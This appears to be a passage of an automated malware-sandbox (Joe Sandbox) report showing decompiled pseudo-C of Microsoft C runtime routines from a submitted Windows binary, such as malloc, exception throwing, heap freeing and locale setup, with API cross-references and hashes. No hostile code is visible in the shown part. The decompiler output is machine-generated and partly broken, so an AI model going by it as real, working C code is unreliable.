                  0x004089b4
                  0x004089b8
                  0x004089ba
                  0x004089bc
                  0x004089bf
                  0x004089c1
                  0x004089c1
                  0x004089bf
                  0x004089c8
                  0x004089d5
                  0x004089dc
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00408943
                  0x00408953
                  0x00000000

                  APIs
                  • _malloc.LIBCMT ref: 00408948
                    • Part of subcall function 0040B500: __FF_MSGBANNER.LIBCMT ref: 0040B523
                    • Part of subcall function 0040B500: __NMSG_WRITE.LIBCMT ref: 0040B52A
                    • Part of subcall function 0040B500: RtlAllocateHeap.NTDLL(00000000,?,?,?,00000001,?,0040807B,00000001,?,?,?,?,?,00404C2F,?), ref: 0040B577
                  • std::bad_alloc::bad_alloc.LIBCMT ref: 0040896B
                    • Part of subcall function 00408913: std::exception::exception.LIBCMT ref: 0040891F
                  • std::bad_exception::bad_exception.LIBCMT ref: 0040897F
                  • __CxxThrowException@8.LIBCMT ref: 0040898D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                  • String ID: %\@
                  • API String ID: 1411284514-2702511825
                  • Opcode ID: 82b8852194485d5dacbc81d7ec5f407009dd89cd278afea175055624b4359e15
                  • Instruction ID: 52eb9eca0bdddc760c4daa140dcd042913d1a06dbc779fed389826f51c154f90
                  • Opcode Fuzzy Hash: 82b8852194485d5dacbc81d7ec5f407009dd89cd278afea175055624b4359e15
                  • Instruction Fuzzy Hash: B7F0E270904209A2DF047722DD0AA7E3BA8AB0175CB24007FFC81751E2EF7C9A45D28E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E0040CFD2(void* __edx, intOrPtr* _a4) {
                  				signed int _v8;
                  				intOrPtr _t11;
                  				intOrPtr* _t15;
                  				intOrPtr* _t19;
                  				void* _t23;
                  				void* _t25;
                  				void* _t26;
                  
                  				_t24 = __edx;
                  				_t11 =  *((intOrPtr*)( *_a4));
                  				if(_t11 == 0xe0434f4d) {
                  					__eflags =  *((intOrPtr*)(E0040DEA3(_t23, __edx, __eflags) + 0x90));
                  					if(__eflags > 0) {
                  						_t15 = E0040DEA3(_t23, __edx, __eflags) + 0x90;
                  						 *_t15 =  *_t15 - 1;
                  						__eflags =  *_t15;
                  					}
                  					goto L5;
                  				} else {
                  					_t32 = _t11 - 0xe06d7363;
                  					if(_t11 != 0xe06d7363) {
                  						L5:
                  						__eflags = 0;
                  						return 0;
                  					} else {
                  						 *(E0040DEA3(_t23, __edx, _t32) + 0x90) =  *(_t16 + 0x90) & 0x00000000;
                  						_push(8);
                  						_push(0x41e520);
                  						E0040EF38(_t23, _t25, _t26);
                  						_t19 =  *((intOrPtr*)(E0040DEA3(_t23, __edx, _t32) + 0x78));
                  						if(_t19 != 0) {
                  							_v8 = _v8 & 0x00000000;
                  							 *_t19();
                  							_v8 = 0xfffffffe;
                  						}
                  						return E0040EF7D(E00408F5F(_t23, _t24, _t25, _t26));
                  					}
                  				}
                  			}










                  0x0040cfd2
                  0x0040cfdc
                  0x0040cfe3
                  0x0040d002
                  0x0040d009
                  0x0040d010
                  0x0040d015
                  0x0040d015
                  0x0040d015
                  0x00000000
                  0x0040cfe5
                  0x0040cfe5
                  0x0040cfea
                  0x0040d017
                  0x0040d017
                  0x0040d01a
                  0x0040cfec
                  0x0040cff1
                  0x0040e179
                  0x0040e17b
                  0x0040e180
                  0x0040e18a
                  0x0040e18f
                  0x0040e191
                  0x0040e195
                  0x0040e1a0
                  0x0040e1a0
                  0x0040e1b1
                  0x0040e1b1
                  0x0040cfea

                  APIs
                  • __getptd.LIBCMT ref: 0040CFEC
                    • Part of subcall function 0040DEA3: __getptd_noexit.LIBCMT ref: 0040DEA6
                    • Part of subcall function 0040DEA3: __amsg_exit.LIBCMT ref: 0040DEB3
                  • __getptd.LIBCMT ref: 0040CFFD
                  • __getptd.LIBCMT ref: 0040D00B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: __getptd$__amsg_exit__getptd_noexit
                  • String ID: MOC$csm
                  • API String ID: 803148776-1389381023
                  • Opcode ID: 6635adbae74f83e2564532d45bb79240dc25a11986ffad02d9b41b795916e814
                  • Instruction ID: 758181b82ad84b3b8dd93517e69ef017ef5c1e08a000de8bff1621ca7a12916d
                  • Opcode Fuzzy Hash: 6635adbae74f83e2564532d45bb79240dc25a11986ffad02d9b41b795916e814
                  • Instruction Fuzzy Hash: 6DE01A359001048FD710AFE9C046B2932A4EB99318F1504B7A40CEB3A2C73CE859A68A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 89%
                  			E00411644(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				signed int _t15;
                  				LONG* _t21;
                  				long _t23;
                  				void* _t31;
                  				LONG* _t33;
                  				void* _t34;
                  				void* _t35;
                  
                  				_t35 = __eflags;
                  				_t29 = __edx;
                  				_t25 = __ebx;
                  				_push(0xc);
                  				_push(0x41e600);
                  				E0040EF38(__ebx, __edi, __esi);
                  				_t31 = E0040DEA3(__ebx, __edx, _t35);
                  				_t15 =  *0x4311f0; // 0xfffffffe
                  				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                  					E0040E43F(_t25, _t31, 0xd);
                  					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                  					_t33 =  *(_t31 + 0x68);
                  					 *(_t34 - 0x1c) = _t33;
                  					__eflags = _t33 -  *0x4310f8; // 0x21a2bb8
                  					if(__eflags != 0) {
                  						__eflags = _t33;
                  						if(_t33 != 0) {
                  							_t23 = InterlockedDecrement(_t33);
                  							__eflags = _t23;
                  							if(_t23 == 0) {
                  								__eflags = _t33 - 0x430cd0;
                  								if(__eflags != 0) {
                  									_push(_t33);
                  									E004089EA(_t25, _t31, _t33, __eflags);
                  								}
                  							}
                  						}
                  						_t21 =  *0x4310f8; // 0x21a2bb8
                  						 *(_t31 + 0x68) = _t21;
                  						_t33 =  *0x4310f8; // 0x21a2bb8
                  						 *(_t34 - 0x1c) = _t33;
                  						InterlockedIncrement(_t33);
                  					}
                  					 *(_t34 - 4) = 0xfffffffe;
                  					E004116DF();
                  				} else {
                  					_t33 =  *(_t31 + 0x68);
                  				}
                  				if(_t33 == 0) {
                  					E0040F461(_t29, 0x20);
                  				}
                  				return E0040EF7D(_t33);
                  			}










                  0x00411644
                  0x00411644
                  0x00411644
                  0x00411644
                  0x00411646
                  0x0041164b
                  0x00411655
                  0x00411657
                  0x0041165f
                  0x00411680
                  0x00411686
                  0x0041168a
                  0x0041168d
                  0x00411690
                  0x00411696
                  0x00411698
                  0x0041169a
                  0x0041169d
                  0x004116a3
                  0x004116a5
                  0x004116a7
                  0x004116ad
                  0x004116af
                  0x004116b0
                  0x004116b5
                  0x004116ad
                  0x004116a5
                  0x004116b6
                  0x004116bb
                  0x004116be
                  0x004116c4
                  0x004116c8
                  0x004116c8
                  0x004116ce
                  0x004116d5
                  0x00411667
                  0x00411667
                  0x00411667
                  0x0041166c
                  0x00411670
                  0x00411675
                  0x0041167d

                  APIs
                  • __getptd.LIBCMT ref: 00411650
                    • Part of subcall function 0040DEA3: __getptd_noexit.LIBCMT ref: 0040DEA6
                    • Part of subcall function 0040DEA3: __amsg_exit.LIBCMT ref: 0040DEB3
                  • __amsg_exit.LIBCMT ref: 00411670
                  • __lock.LIBCMT ref: 00411680
                  • InterlockedDecrement.KERNEL32(?), ref: 0041169D
                  • InterlockedIncrement.KERNEL32(021A2BB8), ref: 004116C8
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                  • String ID:
                  • API String ID: 4271482742-0
                  • Opcode ID: b97259540d5613925d6a5ec233832afa4c94a253ec52663c2bf6152d33804290
                  • Instruction ID: c411eaf418b0c070455f6fdc077d232cb9d96ce55476f56f8c850ce47e0a8d7e
                  • Opcode Fuzzy Hash: b97259540d5613925d6a5ec233832afa4c94a253ec52663c2bf6152d33804290
                  • Instruction Fuzzy Hash: 7601A131E0062297C724AF668806BDA77A06B00714F08412BE904776F0CB3D6CD5CBCD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 39%
                  			E004089EA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr* _t10;
                  				intOrPtr _t13;
                  				intOrPtr _t23;
                  				void* _t25;
                  
                  				_push(0xc);
                  				_push(0x41e230);
                  				_t8 = E0040EF38(__ebx, __edi, __esi);
                  				_t23 =  *((intOrPtr*)(_t25 + 8));
                  				if(_t23 == 0) {
                  					L9:
                  					return E0040EF7D(_t8);
                  				}
                  				if( *0x58add4 != 3) {
                  					_push(_t23);
                  					L7:
                  					if(HeapFree( *0x589108, 0, ??) == 0) {
                  						_t10 = E0040B78C();
                  						 *_t10 = E0040B74A(GetLastError());
                  					}
                  					goto L9;
                  				}
                  				E0040E43F(__ebx, __edi, 4);
                  				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                  				_t13 = E0040E472(_t23);
                  				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                  				if(_t13 != 0) {
                  					_push(_t23);
                  					_push(_t13);
                  					E0040E4A2();
                  				}
                  				 *(_t25 - 4) = 0xfffffffe;
                  				_t8 = E00408A40();
                  				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                  					goto L9;
                  				} else {
                  					_push( *((intOrPtr*)(_t25 + 8)));
                  					goto L7;
                  				}
                  			}







                  0x004089ea
                  0x004089ec
                  0x004089f1
                  0x004089f6
                  0x004089fb
                  0x00408a72
                  0x00408a77
                  0x00408a77
                  0x00408a04
                  0x00408a49
                  0x00408a4a
                  0x00408a5a
                  0x00408a5c
                  0x00408a6f
                  0x00408a71
                  0x00000000
                  0x00408a5a
                  0x00408a08
                  0x00408a0e
                  0x00408a13
                  0x00408a19
                  0x00408a1e
                  0x00408a20
                  0x00408a21
                  0x00408a22
                  0x00408a28
                  0x00408a29
                  0x00408a30
                  0x00408a39
                  0x00000000
                  0x00408a3b
                  0x00408a3b
                  0x00000000
                  0x00408a3b

                  APIs
                  • __lock.LIBCMT ref: 00408A08
                    • Part of subcall function 0040E43F: __mtinitlocknum.LIBCMT ref: 0040E455
                    • Part of subcall function 0040E43F: __amsg_exit.LIBCMT ref: 0040E461
                    • Part of subcall function 0040E43F: EnterCriticalSection.KERNEL32(?,?,?,00412359,00000004,0041E640,0000000C,0040A2F0,?,?,00000000,00000000,00000000,?,0040DE55,00000001), ref: 0040E469
                  • ___sbh_find_block.LIBCMT ref: 00408A13
                  • ___sbh_free_block.LIBCMT ref: 00408A22
                  • HeapFree.KERNEL32(00000000,?,0041E230,0000000C,0040E420,00000000,0041E560,0000000C,0040E45A,?,?,?,00412359,00000004,0041E640,0000000C), ref: 00408A52
                  • GetLastError.KERNEL32(?,00412359,00000004,0041E640,0000000C,0040A2F0,?,?,00000000,00000000,00000000,?,0040DE55,00000001,00000214), ref: 00408A63
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                  • String ID:
                  • API String ID: 2714421763-0
                  • Opcode ID: 45dfd8635cdffa17334fd3b8c630c3eb47b24f95574543ef1acbf92944ac0c0f
                  • Instruction ID: 06907ccf3af6a701bc4d47315f5231b4e973fa5a3009c28bc1da32c29bfb126b
                  • Opcode Fuzzy Hash: 45dfd8635cdffa17334fd3b8c630c3eb47b24f95574543ef1acbf92944ac0c0f
                  • Instruction Fuzzy Hash: BF018F31A01201AADB206BB29E0AB9F3A649F00324F14443FF580B65D1DF3C8840AF9D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 19%
                  			E0040D630(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                  				void* __ebp;
                  				void* _t20;
                  				void* _t22;
                  				void* _t23;
                  				intOrPtr* _t25;
                  				void* _t26;
                  				void* _t27;
                  
                  				_t26 = __esi;
                  				_t25 = __edi;
                  				_t22 = __ebx;
                  				_t29 = _a20;
                  				if(_a20 != 0) {
                  					_push(_a20);
                  					_push(__ebx);
                  					_push(__esi);
                  					_push(_a4);
                  					E0040D59E(__ebx, __edi, __esi, _t29);
                  					_t27 = _t27 + 0x10;
                  				}
                  				_t30 = _a28;
                  				_push(_a4);
                  				if(_a28 != 0) {
                  					_push(_a28);
                  				} else {
                  					_push(_t26);
                  				}
                  				E00408544(_t23);
                  				_push( *_t25);
                  				_push(_a16);
                  				_push(_a12);
                  				_push(_t26);
                  				E0040D01B(_t22, _t25, _t26, _t30);
                  				_push(0x100);
                  				_push(_a24);
                  				_push(_a16);
                  				 *((intOrPtr*)(_t26 + 8)) =  *((intOrPtr*)(_t25 + 4)) + 1;
                  				_push(_a8);
                  				_push(_t26);
                  				_push(_a4);
                  				_t20 = E0040D283( *((intOrPtr*)(_t22 + 0xc)));
                  				if(_t20 != 0) {
                  					E0040850B(_t20, _t26);
                  					return _t20;
                  				}
                  				return _t20;
                  			}










                  0x0040d630
                  0x0040d630
                  0x0040d630
                  0x0040d635
                  0x0040d639
                  0x0040d63b
                  0x0040d63e
                  0x0040d63f
                  0x0040d640
                  0x0040d643
                  0x0040d648
                  0x0040d648
                  0x0040d64b
                  0x0040d64f
                  0x0040d652
                  0x0040d657
                  0x0040d654
                  0x0040d654
                  0x0040d654
                  0x0040d65a
                  0x0040d65f
                  0x0040d661
                  0x0040d664
                  0x0040d667
                  0x0040d668
                  0x0040d670
                  0x0040d675
                  0x0040d679
                  0x0040d67c
                  0x0040d67f
                  0x0040d685
                  0x0040d686
                  0x0040d689
                  0x0040d693
                  0x0040d697
                  0x00000000
                  0x0040d697
                  0x0040d69d

                  APIs
                  • ___BuildCatchObject.LIBCMT ref: 0040D643
                    • Part of subcall function 0040D59E: ___BuildCatchObjectHelper.LIBCMT ref: 0040D5D4
                  • _UnwindNestedFrames.LIBCMT ref: 0040D65A
                  • ___FrameUnwindToState.LIBCMT ref: 0040D668
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                  • String ID: csm
                  • API String ID: 2163707966-1018135373
                  • Opcode ID: 25d8f618258f81dc1646f63685c30713fbebdeec88f6bdfe8158e0d249168221
                  • Instruction ID: 2413127afbe983dbee97c3d26ee7aff4e4fd1c2d8a586a52dd260a433ed668e8
                  • Opcode Fuzzy Hash: 25d8f618258f81dc1646f63685c30713fbebdeec88f6bdfe8158e0d249168221
                  • Instruction Fuzzy Hash: 6C012831801109BBCF126F91CC41EAB7F6AEF08358F00442ABD0C251A1D73AD9A6DBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 65%
                  			E0040C6AA() {
                  				signed long long _v12;
                  				signed int _v20;
                  				signed long long _v28;
                  				signed char _t8;
                  
                  				_t8 = GetModuleHandleA("KERNEL32");
                  				if(_t8 == 0) {
                  					L6:
                  					_v20 =  *0x401fb0;
                  					_v28 =  *0x401fa8;
                  					asm("fsubr qword [ebp-0x18]");
                  					_v12 = _v28 / _v20 * _v20;
                  					asm("fld1");
                  					asm("fcomp qword [ebp-0x8]");
                  					asm("fnstsw ax");
                  					if((_t8 & 0x00000005) != 0) {
                  						return 0;
                  					} else {
                  						return 1;
                  					}
                  				} else {
                  					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                  					if(__eax == 0) {
                  						goto L6;
                  					} else {
                  						_push(0);
                  						return __eax;
                  					}
                  				}
                  			}







                  0x0040c6af
                  0x0040c6b7
                  0x0040c6ce
                  0x0040c67a
                  0x0040c683
                  0x0040c68f
                  0x0040c692
                  0x0040c695
                  0x0040c697
                  0x0040c69a
                  0x0040c69f
                  0x0040c6a9
                  0x0040c6a1
                  0x0040c6a5
                  0x0040c6a5
                  0x0040c6b9
                  0x0040c6bf
                  0x0040c6c7
                  0x00000000
                  0x0040c6c9
                  0x0040c6c9
                  0x0040c6cd
                  0x0040c6cd
                  0x0040c6c7

                  APIs
                  • GetModuleHandleA.KERNEL32(KERNEL32,00408377), ref: 0040C6AF
                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040C6BF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: AddressHandleModuleProc
                  • String ID: IsProcessorFeaturePresent$KERNEL32
                  • API String ID: 1646373207-3105848591
                  • Opcode ID: 262890f937c88bf92e2b03ead55db27850306e213ed55d0593015dd89f505259
                  • Instruction ID: f6d0852723c501d8bd8d87498f3f12253c76d51d564ebb4b4919d4f89cb4afc2
                  • Opcode Fuzzy Hash: 262890f937c88bf92e2b03ead55db27850306e213ed55d0593015dd89f505259
                  • Instruction Fuzzy Hash: A4F0363190090AE2DF101BB1BD8966F7A75BB80742F9109A1E1D1B00E4DF798075D259
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E00406512(intOrPtr __ecx) {
                  				intOrPtr _t11;
                  				void* _t20;
                  				intOrPtr _t21;
                  				void* _t23;
                  
                  				E004088F4(E0041B945, _t23);
                  				_push(__ecx);
                  				_t21 = __ecx;
                  				 *((intOrPtr*)(_t23 - 0x10)) = __ecx;
                  				 *((intOrPtr*)(__ecx)) = 0x401478;
                  				E00407EAA(__ecx + 4);
                  				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
                  				if(E0040892E(4, _t20) == 0) {
                  					_t11 = 0;
                  				} else {
                  					_t11 = E00404DB6(_t10);
                  				}
                  				 *((intOrPtr*)(_t21 + 0x38)) = _t11;
                  				E00405B42(_t21);
                  				 *[fs:0x0] =  *((intOrPtr*)(_t23 - 0xc));
                  				return _t21;
                  			}







                  0x00406517
                  0x0040651c
                  0x0040651e
                  0x00406523
                  0x00406526
                  0x0040652c
                  0x00406531
                  0x0040653f
                  0x0040654a
                  0x00406541
                  0x00406543
                  0x00406543
                  0x0040654e
                  0x00406551
                  0x0040655c
                  0x00406564

                  APIs
                  • __EH_prolog.LIBCMT ref: 00406517
                  • std::_Mutex::_Mutex.LIBCPMT ref: 0040652C
                    • Part of subcall function 0040892E: _malloc.LIBCMT ref: 00408948
                  • std::locale::locale.LIBCPMT ref: 00406543
                    • Part of subcall function 00404DB6: std::locale::_Init.LIBCPMT ref: 00404DB9
                    • Part of subcall function 00404DB6: std::locale::facet::_Incref.LIBCPMT ref: 00404DC7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: H_prologIncrefInitMutexMutex::__mallocstd::_std::locale::_std::locale::facet::_std::locale::locale
                  • String ID: md@
                  • API String ID: 3605895379-3355668050
                  • Opcode ID: 25614b8f63471a171e1313490e958568aaf7ff6a74c3a66878e4c500a15b2e87
                  • Instruction ID: 23c6b60d026b240c0280e98547af473300732b566c8aaa53a888c3382c208aa0
                  • Opcode Fuzzy Hash: 25614b8f63471a171e1313490e958568aaf7ff6a74c3a66878e4c500a15b2e87
                  • Instruction Fuzzy Hash: A0F030B1A106119AC758ABA999117AAB2E4EF44718F10447FA552F36C1DFBCA8008A99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 58%
                  			E00407F62() {
                  				intOrPtr _v16;
                  				void* _v28;
                  				void* _v64;
                  				void* _v104;
                  				void* __esi;
                  				void* _t17;
                  				intOrPtr* _t19;
                  				void* _t20;
                  				void* _t21;
                  				intOrPtr* _t22;
                  				void* _t24;
                  
                  				_push(0x44);
                  				E0040A41A(E0041BB98, _t17, _t20, _t21);
                  				E004070F9(_t24 - 0x28, _t20, "invalid string position");
                  				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
                  				_t19 = _t24 - 0x50;
                  				E00407EDB(_t19, _t24 - 0x28);
                  				E00408993(_t24 - 0x50, 0x41e1c4);
                  				asm("int3");
                  				_push(_t24);
                  				_push(_t21);
                  				_push(_v16);
                  				_t22 = _t19;
                  				E00407163(_t19);
                  				 *_t22 = 0x4015dc;
                  				return _t22;
                  			}














                  0x00407f62
                  0x00407f69
                  0x00407f76
                  0x00407f7b
                  0x00407f83
                  0x00407f86
                  0x00407f94
                  0x00407f99
                  0x00407f9c
                  0x00407f9f
                  0x00407fa0
                  0x00407fa3
                  0x00407fa5
                  0x00407faa
                  0x00407fb4

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00407F69
                  • std::bad_exception::bad_exception.LIBCMT ref: 00407F86
                  • __CxxThrowException@8.LIBCMT ref: 00407F94
                    • Part of subcall function 00408993: RaiseException.KERNEL32(?,?,00408992,?,?,?,?,%\@,00408992,?,0041DC84,005890B4,?,00405C25,?), ref: 004089D5
                    • Part of subcall function 00407163: __EH_prolog.LIBCMT ref: 00407168
                    • Part of subcall function 00407163: std::exception::exception.LIBCMT ref: 00407179
                  Strings
                  • invalid string position, xrefs: 00407F6E
                  Memory Dump Source
                  • Source File: 00000000.00000002.253878180.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.253870257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253948004.000000000041D000.00000020.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.253956117.0000000000420000.00000008.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254006910.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254029990.0000000000589000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.254035159.000000000058B000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_P2SMn3jloH.jbxd
                  Similarity
                  • API ID: ExceptionException@8H_prologH_prolog3RaiseThrowstd::bad_exception::bad_exceptionstd::exception::exception
                  • String ID: invalid string position
                  • API String ID: 255094582-1799206989
                  • Opcode ID: f61dd5d69e0939b6d01dee7f2a7077beb1d929d1cc6191542035642852c20efb
                  • Instruction ID: c62036e1dc2366c616dcb7c6471c16903c1fd0bc8280358541a65c12d3c157ab
                  • Opcode Fuzzy Hash: f61dd5d69e0939b6d01dee7f2a7077beb1d929d1cc6191542035642852c20efb
                  • Instruction Fuzzy Hash: 64F0A07690421CA7C710EAD2CC05ACEB728AB40760F10403FB201BB6C1DBBCA904C79E
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E0040712A(void* __edi) {
                  				intOrPtr* _t26;
                  				intOrPtr _t30;
                  				intOrPtr* _t34;
                  				void* _t36;
                  
                  				E004088F4(E0041BA05, _t36);
                  				E004070F9(_t36 - 0x28, __edi, "vector<T> too long");
                  				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                  				_t26 = _t36 - 0x50;
                  				E00406F6D(_t26, _t36 - 0x28);
                  				E00408993(_t36 - 0x50, 0x41de9c);
                  				asm("int3");
                  				E004088F4(E0041B9C6, _t36);
                  				_push(_t26);
                  				_push(__edi);
                  				_t30 =  *((intOrPtr*)(_t36 + 8));
                  				_t34 = _t26;
                  				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
                  				E004080C3(_t26, _t30);
                  				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                  				_t31 = _t30 + 0xc;
                  				 *_t34 = 0x4014f8;
                  				E00406EE5(_t34 + 0xc, _t30 + 0xc, _t31);
                  				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
                  				return _t34;
                  			}







                  0x0040712f
